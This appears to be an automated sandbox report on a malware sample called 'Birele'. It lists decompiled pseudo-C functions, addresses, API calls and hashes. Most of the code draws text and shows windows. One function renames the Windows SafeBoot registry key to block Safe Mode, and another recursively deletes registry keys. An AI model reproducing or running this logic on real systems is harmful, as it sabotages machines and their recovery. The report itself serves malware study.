                                                                                                          					} else {
                                                                                                          						if(_t102 == 1) {
                                                                                                          							_v36 = _v36 | 0x00000001;
                                                                                                          						}
                                                                                                          					}
                                                                                                          					_t152 = _t131;
                                                                                                          					while(_t152 != 0 &&  *((intOrPtr*)(_t152 + 0xa8)) == 0) {
                                                                                                          						_t152 =  *((intOrPtr*)(_t152 + 0x30));
                                                                                                          					}
                                                                                                          					_t132 = 0;
                                                                                                          					_t166 = _t152;
                                                                                                          					if(_t152 != 0) {
                                                                                                          						_t120 = E00406B4C(E00407D04(_t152), _t138, _t166);
                                                                                                          						_t132 = SelectObject(E00406E28(E00407FD0(_t149, _t136, _t138)), _t120);
                                                                                                          					}
                                                                                                          					_t106 = E00403C48(_v32);
                                                                                                          					_t108 = E00403E38(_v32);
                                                                                                          					_v16 = DrawTextA(E00406E28( *((intOrPtr*)(_t149 + 0xca))), _t108, _t106,  &_v52, _v36);
                                                                                                          					if(_t152 != 0) {
                                                                                                          						SelectObject( *(E00407FD0(_t149, _t136, _t138) + 0x1c), _t132);
                                                                                                          					}
                                                                                                          					_v20 = _v52.right - _v52.left;
                                                                                                          				}
                                                                                                          			}

































                                                                                                          0x00406520
                                                                                                          0x0040652b
                                                                                                          0x0040652e
                                                                                                          0x00406532
                                                                                                          0x00406533
                                                                                                          0x00406538
                                                                                                          0x0040653b
                                                                                                          0x00406541
                                                                                                          0x00406543
                                                                                                          0x00406549
                                                                                                          0x00406550
                                                                                                          0x00406555
                                                                                                          0x0040655c
                                                                                                          0x00406662
                                                                                                          0x00406662
                                                                                                          0x00406664
                                                                                                          0x0040666c
                                                                                                          0x0040666e
                                                                                                          0x0040667c
                                                                                                          0x00406681
                                                                                                          0x00406689
                                                                                                          0x0040668e
                                                                                                          0x00406693
                                                                                                          0x00406698
                                                                                                          0x0040669d
                                                                                                          0x0040669d
                                                                                                          0x004066a1
                                                                                                          0x004066a6
                                                                                                          0x004066af
                                                                                                          0x004066b1
                                                                                                          0x004066ba
                                                                                                          0x004066bf
                                                                                                          0x004066bf
                                                                                                          0x004066af
                                                                                                          0x004066c1
                                                                                                          0x004066c9
                                                                                                          0x004066d3
                                                                                                          0x004066db
                                                                                                          0x004066e0
                                                                                                          0x004066e8
                                                                                                          0x004066ed
                                                                                                          0x004066f2
                                                                                                          0x004066f7
                                                                                                          0x004066fc
                                                                                                          0x004066fc
                                                                                                          0x0040670e
                                                                                                          0x00406719
                                                                                                          0x0040671e
                                                                                                          0x0040671e
                                                                                                          0x00000000
                                                                                                          0x004066cb
                                                                                                          0x004066cb
                                                                                                          0x004066cd
                                                                                                          0x00000000
                                                                                                          0x00406720
                                                                                                          0x00406720
                                                                                                          0x00406722
                                                                                                          0x00406726
                                                                                                          0x00406726
                                                                                                          0x0040672e
                                                                                                          0x00406731
                                                                                                          0x00406734
                                                                                                          0x00406741
                                                                                                          0x00406741
                                                                                                          0x004066cd
                                                                                                          0x004066c9
                                                                                                          0x00406562
                                                                                                          0x0040656a
                                                                                                          0x00406575
                                                                                                          0x0040657a
                                                                                                          0x0040657a
                                                                                                          0x00406581
                                                                                                          0x0040658c
                                                                                                          0x00406591
                                                                                                          0x00406594
                                                                                                          0x00406597
                                                                                                          0x0040659c
                                                                                                          0x004065a2
                                                                                                          0x004065b5
                                                                                                          0x004065ba
                                                                                                          0x004065bf
                                                                                                          0x004065c9
                                                                                                          0x004065cb
                                                                                                          0x004065d7
                                                                                                          0x004065d7
                                                                                                          0x004065d7
                                                                                                          0x004065cd
                                                                                                          0x004065cf
                                                                                                          0x004065d1
                                                                                                          0x004065d1
                                                                                                          0x004065cf
                                                                                                          0x004065db
                                                                                                          0x004065e2
                                                                                                          0x004065df
                                                                                                          0x004065df
                                                                                                          0x004065ef
                                                                                                          0x004065f1
                                                                                                          0x004065f3
                                                                                                          0x004065fc
                                                                                                          0x00406614
                                                                                                          0x00406614
                                                                                                          0x00406621
                                                                                                          0x0040662a
                                                                                                          0x00406641
                                                                                                          0x00406646
                                                                                                          0x00406654
                                                                                                          0x00406654
                                                                                                          0x0040665f
                                                                                                          0x0040665f

                                                                                                          APIs
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0040660F
                                                                                                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000002), ref: 0040663C
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00406654
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectSelect$DrawText
                                                                                                          • String ID: D\@
                                                                                                          • API String ID: 2627105080-3892359110
                                                                                                          • Opcode ID: 5eaea885d48285fb43c7fe077c569aa3710862acaa3c0c5f26809f93b59757aa
                                                                                                          • Instruction ID: 34afb7285cee6a7a0d4f1a8fc553a28e21d78793f8037de695fd2fb115f7d147
                                                                                                          • Opcode Fuzzy Hash: 5eaea885d48285fb43c7fe077c569aa3710862acaa3c0c5f26809f93b59757aa
                                                                                                          • Instruction Fuzzy Hash: 7F51B470A046555BCB10EB79CC81AAFB7B5AF44308F05853AE845F7386DB3CA911CB5D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 466 40651e-40655c call 403a44 470 406662-40666e 466->470 471 406562-40656a 466->471 472 406670-406672 470->472 473 406674-40668e call 4079f0 470->473 474 40656c-406570 471->474 475 40657f-40658c call 4083e0 call 407fd0 471->475 472->473 477 4066c1-4066c9 472->477 488 406690-40669d call 4079fc 473->488 489 40669f-4066af call 4079f0 473->489 474->475 479 406572-40657a call 403c50 474->479 490 406591-406597 call 406dfc 475->490 481 4066d3-4066ed call 407a18 477->481 482 4066cb-4066cd 477->482 479->475 498 4066fe-40670e call 407a18 481->498 499 4066ef-4066fc call 407a24 481->499 482->481 486 4066cf-4066d1 482->486 486->481 491 406720-406722 486->491 488->489 489->477 502 4066b1-4066bf call 4079fc 489->502 504 40659c-4065a2 490->504 495 406724 491->495 496 40672c-406741 call 4039ac 491->496 495->496 498->491 515 406710-40671e call 407a24 498->515 499->498 502->477 504->470 509 4065a8-4065af 504->509 509->470 514 4065b5-4065cb call 4077ec 509->514 520 4065d7 514->520 521 4065cd-4065cf 514->521 515->491 522 4065db-4065dd 520->522 521->522 523 4065d1-4065d5 521->523 524 4065e2-4065e4 522->524 523->522 525 4065e6-4065ed 524->525 526 4065ef-4065f3 524->526 525->526 527 4065df 525->527 528 4065f5-406614 call 407d04 call 406b4c call 407fd0 call 406e28 SelectObject 526->528 529 406616-406646 call 403c48 call 403e38 call 406e28 DrawTextA 526->529 527->524 528->529 542 406648-406654 call 407fd0 SelectObject 529->542 543 406659-40665f 529->543 542->543 543->470
                                                                                                          C-Code - Quality: 69%
                                                                                                          			E0040651E(intOrPtr __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				intOrPtr _v12;
                                                                                                          				int _v16;
                                                                                                          				char _v20;
                                                                                                          				char _v28;
                                                                                                          				void* _v32;
                                                                                                          				signed int _v36;
                                                                                                          				struct tagRECT _v52;
                                                                                                          				void* _t62;
                                                                                                          				void* _t66;
                                                                                                          				void* _t68;
                                                                                                          				intOrPtr _t69;
                                                                                                          				void* _t73;
                                                                                                          				void* _t85;
                                                                                                          				intOrPtr _t92;
                                                                                                          				void* _t97;
                                                                                                          				void* _t102;
                                                                                                          				int _t106;
                                                                                                          				CHAR* _t108;
                                                                                                          				void* _t120;
                                                                                                          				intOrPtr _t129;
                                                                                                          				void* _t130;
                                                                                                          				intOrPtr _t131;
                                                                                                          				void* _t132;
                                                                                                          				void* _t133;
                                                                                                          				intOrPtr _t144;
                                                                                                          				intOrPtr _t149;
                                                                                                          				intOrPtr _t151;
                                                                                                          				intOrPtr _t152;
                                                                                                          				void* _t155;
                                                                                                          
                                                                                                          				_t133 = __ecx;
                                                                                                          				_v32 = 0;
                                                                                                          				_t149 = __eax;
                                                                                                          				_push(_t155);
                                                                                                          				_push(0x406742);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t155 + 0xffffffd0;
                                                                                                          				_t129 = __eax;
                                                                                                          				_t138 =  *((intOrPtr*)(__eax + 0xe2));
                                                                                                          				E00403A44( &_v32,  *((intOrPtr*)(__eax + 0xe2)));
                                                                                                          				_v20 = 0;
                                                                                                          				_v16 = 0;
                                                                                                          				if(_v32 == 0) {
                                                                                                          					L20:
                                                                                                          					_t130 = 0;
                                                                                                          					_t151 = _t149;
                                                                                                          					_t62 =  *((intOrPtr*)(_t151 + 0x13a)) - 2;
                                                                                                          					if(_t62 < 0 || _t62 == 1) {
                                                                                                          						_v8 = 0;
                                                                                                          						_t66 = E004079F0(_t138);
                                                                                                          						_t140 = _v20 + _v8;
                                                                                                          						if(_t66 != _v20 + _v8) {
                                                                                                          							_t140 = _v20 + _v8;
                                                                                                          							E004079FC(_v20 + _v8);
                                                                                                          							_t130 = 1;
                                                                                                          						}
                                                                                                          						_t68 = E004079F0(_t140);
                                                                                                          						_t138 =  *((short*)(_t151 + 0xd8));
                                                                                                          						if(_t68 <  *((short*)(_t151 + 0xd8))) {
                                                                                                          							_t138 =  *((short*)(_t151 + 0xd8));
                                                                                                          							E004079FC( *((short*)(_t151 + 0xd8)));
                                                                                                          							_t130 = 1;
                                                                                                          						}
                                                                                                          					}
                                                                                                          					_t69 =  *((intOrPtr*)(_t151 + 0x13a));
                                                                                                          					if(_t69 == 0) {
                                                                                                          						L29:
                                                                                                          						_v12 = 0;
                                                                                                          						_t73 = E00407A18(_t138);
                                                                                                          						_t142 = _v16 + _v12;
                                                                                                          						if(_t73 != _v16 + _v12) {
                                                                                                          							_t142 = _v16 + _v12;
                                                                                                          							E00407A24(_v16 + _v12);
                                                                                                          							_t130 = 1;
                                                                                                          						}
                                                                                                          						if(E00407A18(_t142) <  *((short*)(_t151 + 0xdc))) {
                                                                                                          							E00407A24( *((short*)(_t151 + 0xdc)));
                                                                                                          							_t130 = 1;
                                                                                                          						}
                                                                                                          						goto L33;
                                                                                                          					} else {
                                                                                                          						_t85 = _t69 - 2;
                                                                                                          						if(_t85 == 0 || _t85 == 2) {
                                                                                                          							goto L29;
                                                                                                          						} else {
                                                                                                          							L33:
                                                                                                          							if(_t130 != 0) {
                                                                                                          								 *0x418104();
                                                                                                          							}
                                                                                                          							_pop(_t144);
                                                                                                          							 *[fs:eax] = _t144;
                                                                                                          							_push(E00406749);
                                                                                                          							return E004039AC( &_v32);
                                                                                                          						}
                                                                                                          					}
                                                                                                          				} else {
                                                                                                          					_t92 =  *((intOrPtr*)(_t129 + 0xa8));
                                                                                                          					if(_t92 != 0 &&  *((char*)(_t92 + 0x45)) != 0) {
                                                                                                          						_t138 = 0x406758;
                                                                                                          						E00403C50( &_v32, 0x406758);
                                                                                                          					}
                                                                                                          					E004083E0(_t129);
                                                                                                          					_t97 = E00407FD0(_t129, _t133, _t138);
                                                                                                          					_t136 =  &_v20;
                                                                                                          					_t138 = _v32;
                                                                                                          					E00406DFC(_t97,  &_v20, _v32,  &_v28); // executed
                                                                                                          					_t131 = _t149;
                                                                                                          					if(( *(_t131 + 0x34) & 0x00000001) != 0 &&  *((char*)(_t131 + 0x13a)) != 5) {
                                                                                                          						_t138 =  &_v52;
                                                                                                          						E004077EC(_t131,  &_v52);
                                                                                                          						_v36 = 0x450;
                                                                                                          						_t102 =  *((intOrPtr*)(_t131 + 0x3a)) - 1;
                                                                                                          						if(_t102 == 0) {
                                                                                                          							_t22 =  &_v36;
                                                                                                          							 *_t22 = _v36 | 0x00000002;
                                                                                                          							__eflags =  *_t22;
                                                                                                          						} else {
                                                                                                          							if(_t102 == 1) {
                                                                                                          								_v36 = _v36 | 0x00000001;
                                                                                                          							}
                                                                                                          						}
                                                                                                          						_t152 = _t131;
                                                                                                          						while(_t152 != 0 &&  *((intOrPtr*)(_t152 + 0xa8)) == 0) {
                                                                                                          							_t152 =  *((intOrPtr*)(_t152 + 0x30));
                                                                                                          						}
                                                                                                          						_t132 = 0;
                                                                                                          						_t166 = _t152;
                                                                                                          						if(_t152 != 0) {
                                                                                                          							_t120 = E00406B4C(E00407D04(_t152), _t138, _t166);
                                                                                                          							_t132 = SelectObject(E00406E28(E00407FD0(_t149, _t136, _t138)), _t120);
                                                                                                          						}
                                                                                                          						_t106 = E00403C48(_v32);
                                                                                                          						_t108 = E00403E38(_v32);
                                                                                                          						_v16 = DrawTextA(E00406E28( *((intOrPtr*)(_t149 + 0xca))), _t108, _t106,  &_v52, _v36);
                                                                                                          						if(_t152 != 0) {
                                                                                                          							SelectObject( *(E00407FD0(_t149, _t136, _t138) + 0x1c), _t132);
                                                                                                          						}
                                                                                                          						_v20 = _v52.right - _v52.left;
                                                                                                          					}
                                                                                                          					goto L20;
                                                                                                          				}
                                                                                                          			}

































                                                                                                          0x0040651e
                                                                                                          0x0040652b
                                                                                                          0x0040652e
                                                                                                          0x00406532
                                                                                                          0x00406533
                                                                                                          0x00406538
                                                                                                          0x0040653b
                                                                                                          0x00406541
                                                                                                          0x00406543
                                                                                                          0x00406549
                                                                                                          0x00406550
                                                                                                          0x00406555
                                                                                                          0x0040655c
                                                                                                          0x00406662
                                                                                                          0x00406662
                                                                                                          0x00406664
                                                                                                          0x0040666c
                                                                                                          0x0040666e
                                                                                                          0x0040667c
                                                                                                          0x00406681
                                                                                                          0x00406689
                                                                                                          0x0040668e
                                                                                                          0x00406693
                                                                                                          0x00406698
                                                                                                          0x0040669d
                                                                                                          0x0040669d
                                                                                                          0x004066a1
                                                                                                          0x004066a6
                                                                                                          0x004066af
                                                                                                          0x004066b1
                                                                                                          0x004066ba
                                                                                                          0x004066bf
                                                                                                          0x004066bf
                                                                                                          0x004066af
                                                                                                          0x004066c1
                                                                                                          0x004066c9
                                                                                                          0x004066d3
                                                                                                          0x004066db
                                                                                                          0x004066e0
                                                                                                          0x004066e8
                                                                                                          0x004066ed
                                                                                                          0x004066f2
                                                                                                          0x004066f7
                                                                                                          0x004066fc
                                                                                                          0x004066fc
                                                                                                          0x0040670e
                                                                                                          0x00406719
                                                                                                          0x0040671e
                                                                                                          0x0040671e
                                                                                                          0x00000000
                                                                                                          0x004066cb
                                                                                                          0x004066cb
                                                                                                          0x004066cd
                                                                                                          0x00000000
                                                                                                          0x00406720
                                                                                                          0x00406720
                                                                                                          0x00406722
                                                                                                          0x00406726
                                                                                                          0x00406726
                                                                                                          0x0040672e
                                                                                                          0x00406731
                                                                                                          0x00406734
                                                                                                          0x00406741
                                                                                                          0x00406741
                                                                                                          0x004066cd
                                                                                                          0x00406562
                                                                                                          0x00406562
                                                                                                          0x0040656a
                                                                                                          0x00406575
                                                                                                          0x0040657a
                                                                                                          0x0040657a
                                                                                                          0x00406581
                                                                                                          0x0040658c
                                                                                                          0x00406591
                                                                                                          0x00406594
                                                                                                          0x00406597
                                                                                                          0x0040659c
                                                                                                          0x004065a2
                                                                                                          0x004065b5
                                                                                                          0x004065ba
                                                                                                          0x004065bf
                                                                                                          0x004065c9
                                                                                                          0x004065cb
                                                                                                          0x004065d7
                                                                                                          0x004065d7
                                                                                                          0x004065d7
                                                                                                          0x004065cd
                                                                                                          0x004065cf
                                                                                                          0x004065d1
                                                                                                          0x004065d1
                                                                                                          0x004065cf
                                                                                                          0x004065db
                                                                                                          0x004065e2
                                                                                                          0x004065df
                                                                                                          0x004065df
                                                                                                          0x004065ef
                                                                                                          0x004065f1
                                                                                                          0x004065f3
                                                                                                          0x004065fc
                                                                                                          0x00406614
                                                                                                          0x00406614
                                                                                                          0x00406621
                                                                                                          0x0040662a
                                                                                                          0x00406641
                                                                                                          0x00406646
                                                                                                          0x00406654
                                                                                                          0x00406654
                                                                                                          0x0040665f
                                                                                                          0x0040665f
                                                                                                          0x00000000
                                                                                                          0x004065a2

                                                                                                          APIs
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0040660F
                                                                                                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000002), ref: 0040663C
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00406654
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectSelect$DrawText
                                                                                                          • String ID: D\@
                                                                                                          • API String ID: 2627105080-3892359110
                                                                                                          • Opcode ID: 527b19212d4c023dc181196d4a89c01b39c26c164d12a500746eadce34d473f3
                                                                                                          • Instruction ID: 6ab38a91ede8deb55b8f4584c7ef373f68ebec9fdb6bc6ba78808c4b198c6fa1
                                                                                                          • Opcode Fuzzy Hash: 527b19212d4c023dc181196d4a89c01b39c26c164d12a500746eadce34d473f3
                                                                                                          • Instruction Fuzzy Hash: A151B370A046555BCB10EB79CC81AAFB7A9AF44308F05853AE845F7386DB3CAD11CB5D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 548 4076a4-4076aa 549 4076b0-4076b3 548->549 550 4076ac 548->550 551 4076b5-4076b6 549->551 552 4076c9 549->552 550->549 553 4076b8-4076c4 ShowWindow 551->553 554 4076ca-4076dd ShowWindow 551->554 553->552
                                                                                                          C-Code - Quality: 15%
                                                                                                          			E004076A4(void* __eax, void* __edx) {
                                                                                                          				void* _t9;
                                                                                                          				void* _t14;
                                                                                                          				int _t15;
                                                                                                          				struct HWND__* _t16;
                                                                                                          				signed char _t19;
                                                                                                          
                                                                                                          				_t9 = __eax;
                                                                                                          				 *(__eax + 0x27) =  *(__eax + 0x27) & 0x000000ef;
                                                                                                          				if(__edx != 0) {
                                                                                                          					_t3 = __eax + 0x27;
                                                                                                          					 *_t3 =  *(__eax + 0x27) | 0x00000010;
                                                                                                          					_t19 =  *_t3;
                                                                                                          				}
                                                                                                          				_t16 =  *(_t9 + 0x1c);
                                                                                                          				asm("jecxz 0x16");
                                                                                                          				_push(_t9);
                                                                                                          				if(_t19 == 0) {
                                                                                                          					 *(_t9 + 0x37) =  *(_t9 + 0x37) & 0x000000fe;
                                                                                                          					ShowWindow(_t16, 0);
                                                                                                          					return  *0x418104();
                                                                                                          				} else {
                                                                                                          					 *0x418104();
                                                                                                          					_pop(_t14);
                                                                                                          					_t15 = ShowWindow( *(_t14 + 0x1c), 5); // executed
                                                                                                          					return _t15;
                                                                                                          				}
                                                                                                          			}








                                                                                                          0x004076a4
                                                                                                          0x004076a4
                                                                                                          0x004076aa
                                                                                                          0x004076ac
                                                                                                          0x004076ac
                                                                                                          0x004076ac
                                                                                                          0x004076ac
                                                                                                          0x004076b0
                                                                                                          0x004076b3
                                                                                                          0x004076b5
                                                                                                          0x004076b6
                                                                                                          0x004076ca
                                                                                                          0x004076d1
                                                                                                          0x004076dd
                                                                                                          0x004076b8
                                                                                                          0x004076b8
                                                                                                          0x004076be
                                                                                                          0x004076c4
                                                                                                          0x004076c9
                                                                                                          0x004076c9

                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(00000000,00000005,?,00407751,?,004079F5), ref: 004076C4
                                                                                                          • ShowWindow.USER32(00000000,00000000,?,004083F7,00000000,00407ABF,?,00406137,00407716,?,?,00407751,?,004079F5), ref: 004076D1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ShowWindow
                                                                                                          • String ID: D\@
                                                                                                          • API String ID: 1268545403-3892359110
                                                                                                          • Opcode ID: 0f37c24e6feef92659671b6ae8c71a02bc8bfd50d24285b9b6259690f18bf173
                                                                                                          • Instruction ID: ec1750e1b10e8a368bb44e678b50c6d7f3447b465052546ed2b7411cfa354201
                                                                                                          • Opcode Fuzzy Hash: 0f37c24e6feef92659671b6ae8c71a02bc8bfd50d24285b9b6259690f18bf173
                                                                                                          • Instruction Fuzzy Hash: A6E0DF70418B50AECB106B34CDDCF633E00AB01330F514AF9E052AB0F2CA7E94058B1E
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 76%
                                                                                                          			E00416AF0(void* __eax, void* __eflags) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				void* __ebx;
                                                                                                          				void* __ecx;
                                                                                                          				void* __edi;
                                                                                                          				void* __esi;
                                                                                                          				void* __ebp;
                                                                                                          				void* _t25;
                                                                                                          				intOrPtr _t35;
                                                                                                          				void* _t37;
                                                                                                          				void* _t38;
                                                                                                          				intOrPtr _t40;
                                                                                                          
                                                                                                          				_t25 = __eax;
                                                                                                          				_v8 = E004150EC(1);
                                                                                                          				_push(0x416b7a);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t40;
                                                                                                          				E0041518C(_v8, 0x80000002);
                                                                                                          				E004152D0(_v8, _t25, 1, "SYSTEM\\CurrentControlSet\\Control", _t38); // executed
                                                                                                          				_t42 = _t25;
                                                                                                          				if(_t25 == 0) {
                                                                                                          					E00415D0C(_v8, "SafeBoot", "SystemNls", _t37, __eflags, 1);
                                                                                                          					E00402EF8(_v8);
                                                                                                          				} else {
                                                                                                          					E00415D0C(_v8, "SystemNls", "SafeBoot", _t37, _t42, 1); // executed
                                                                                                          					E00402EF8(_v8);
                                                                                                          				}
                                                                                                          				_pop(_t35);
                                                                                                          				 *[fs:eax] = _t35;
                                                                                                          				return 0;
                                                                                                          			}














                                                                                                          0x00416af7
                                                                                                          0x00416b05
                                                                                                          0x00416b0b
                                                                                                          0x00416b10
                                                                                                          0x00416b13
                                                                                                          0x00416b1e
                                                                                                          0x00416b2d
                                                                                                          0x00416b32
                                                                                                          0x00416b34
                                                                                                          0x00416b63
                                                                                                          0x00416b6b
                                                                                                          0x00416b36
                                                                                                          0x00416b45
                                                                                                          0x00416b4d
                                                                                                          0x00416b4d
                                                                                                          0x00416b72
                                                                                                          0x00416b75
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$Open
                                                                                                          • String ID: SYSTEM\CurrentControlSet\Control$SafeBoot$SystemNls$dPA
                                                                                                          • API String ID: 2976201327-1433115898
                                                                                                          • Opcode ID: 716e7242211e8ba7b4ef8ad312a81c7c178b5fa3d13c607168e58978dc7bb9e1
                                                                                                          • Instruction ID: 57d4b4f8c09642b4eb9741871bfe027d7f06fb12f2089bea81cf561b24dce8cb
                                                                                                          • Opcode Fuzzy Hash: 716e7242211e8ba7b4ef8ad312a81c7c178b5fa3d13c607168e58978dc7bb9e1
                                                                                                          • Instruction Fuzzy Hash: 8701C031308214EBD300EB55E8429CDB7A8EB80318B228077F500DB691D77ABE80A75C
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 73%
                                                                                                          			E004153F4(intOrPtr __eax, void* __ebx, void* __edx, void* __esi) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				int _v12;
                                                                                                          				char _v13;
                                                                                                          				char _v20;
                                                                                                          				char _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				void* _v32;
                                                                                                          				intOrPtr _v56;
                                                                                                          				char _v60;
                                                                                                          				char _v64;
                                                                                                          				void* _t51;
                                                                                                          				char* _t53;
                                                                                                          				long _t56;
                                                                                                          				long _t71;
                                                                                                          				long _t80;
                                                                                                          				void* _t90;
                                                                                                          				int _t93;
                                                                                                          				intOrPtr _t106;
                                                                                                          				intOrPtr _t110;
                                                                                                          				void* _t116;
                                                                                                          				void* _t118;
                                                                                                          				void* _t119;
                                                                                                          				intOrPtr _t120;
                                                                                                          
                                                                                                          				_t116 = __esi;
                                                                                                          				_t118 = _t119;
                                                                                                          				_t120 = _t119 + 0xffffffc4;
                                                                                                          				_push(__ebx);
                                                                                                          				_v64 = 0;
                                                                                                          				_v20 = 0;
                                                                                                          				_v24 = 0;
                                                                                                          				_t90 = __edx;
                                                                                                          				_v8 = __eax;
                                                                                                          				_push(_t118);
                                                                                                          				_push(0x41555d);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t120;
                                                                                                          				E00403A44( &_v20, __edx);
                                                                                                          				_v13 = E00415080(_v20);
                                                                                                          				if(_v13 == 0) {
                                                                                                          					E00403ED8( &_v20, 1, 1);
                                                                                                          				}
                                                                                                          				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                          				_t51 = E00415774(_v8, _t90, _t90, _t116); // executed
                                                                                                          				_v32 = _t51;
                                                                                                          				_t122 = _v32;
                                                                                                          				if(_v32 == 0) {
                                                                                                          					_t53 = E00403E38(_v20);
                                                                                                          					_t56 = RegDeleteKeyA(E004151DC(_v8, _v13), _t53); // executed
                                                                                                          					_t56 = 0;
                                                                                                          					_pop(_t106);
                                                                                                          					 *[fs:eax] = _t106;
                                                                                                          					_push(E00415564);
                                                                                                          					E004039AC( &_v64);
                                                                                                          					return E004039D0( &_v24, 2);
                                                                                                          				} else {
                                                                                                          					_push(_t118);
                                                                                                          					_push(0x415514);
                                                                                                          					_push( *[fs:eax]);
                                                                                                          					 *[fs:eax] = _t120;
                                                                                                          					E004151F0(_v8, _v32);
                                                                                                          					if(E0041558C(_v8,  &_v60, _t122) != 0) {
                                                                                                          						E00403A9C( &_v24, _v56 + 1, 0);
                                                                                                          						_t93 = _v60 - 1;
                                                                                                          						if(_t93 >= 0) {
                                                                                                          							do {
                                                                                                          								_v12 = _v56 + 1;
                                                                                                          								_t80 = RegEnumKeyExA(_v32, _t93, E00403E38(_v24),  &_v12, 0, 0, 0, 0); // executed
                                                                                                          								if(_t80 == 0) {
                                                                                                          									E00403BA4( &_v64, E00403E38(_v24));
                                                                                                          									E004153F4(_v8, _t93, _v64, _t116); // executed
                                                                                                          								}
                                                                                                          								_t93 = _t93 - 1;
                                                                                                          							} while (_t93 != 0xffffffff);
                                                                                                          						}
                                                                                                          					}
                                                                                                          					_pop(_t110);
                                                                                                          					 *[fs:eax] = _t110;
                                                                                                          					_push(0x41551b);
                                                                                                          					E004151F0(_v8, _v28);
                                                                                                          					_t71 = RegCloseKey(_v32); // executed
                                                                                                          					return _t71;
                                                                                                          				}
                                                                                                          			}


























                                                                                                          0x004153f4
                                                                                                          0x004153f5
                                                                                                          0x004153f7
                                                                                                          0x004153fa
                                                                                                          0x004153fd
                                                                                                          0x00415400
                                                                                                          0x00415403
                                                                                                          0x00415406
                                                                                                          0x00415408
                                                                                                          0x0041540d
                                                                                                          0x0041540e
                                                                                                          0x00415413
                                                                                                          0x00415416
                                                                                                          0x0041541e
                                                                                                          0x0041542b
                                                                                                          0x00415432
                                                                                                          0x00415441
                                                                                                          0x00415441
                                                                                                          0x0041544c
                                                                                                          0x00415454
                                                                                                          0x00415459
                                                                                                          0x0041545c
                                                                                                          0x00415460
                                                                                                          0x0041551e
                                                                                                          0x00415530
                                                                                                          0x0041553a
                                                                                                          0x0041553c
                                                                                                          0x0041553f
                                                                                                          0x00415542
                                                                                                          0x0041554a
                                                                                                          0x0041555c
                                                                                                          0x00415466
                                                                                                          0x00415468
                                                                                                          0x00415469
                                                                                                          0x0041546e
                                                                                                          0x00415471
                                                                                                          0x0041547a
                                                                                                          0x0041548c
                                                                                                          0x00415497
                                                                                                          0x0041549f
                                                                                                          0x004154a3
                                                                                                          0x004154a5
                                                                                                          0x004154a9
                                                                                                          0x004154c6
                                                                                                          0x004154cd
                                                                                                          0x004154dc
                                                                                                          0x004154e7
                                                                                                          0x004154e7
                                                                                                          0x004154ec
                                                                                                          0x004154ed
                                                                                                          0x004154a5
                                                                                                          0x004154a3
                                                                                                          0x004154f4
                                                                                                          0x004154f7
                                                                                                          0x004154fa
                                                                                                          0x00415505
                                                                                                          0x0041550e
                                                                                                          0x00415513
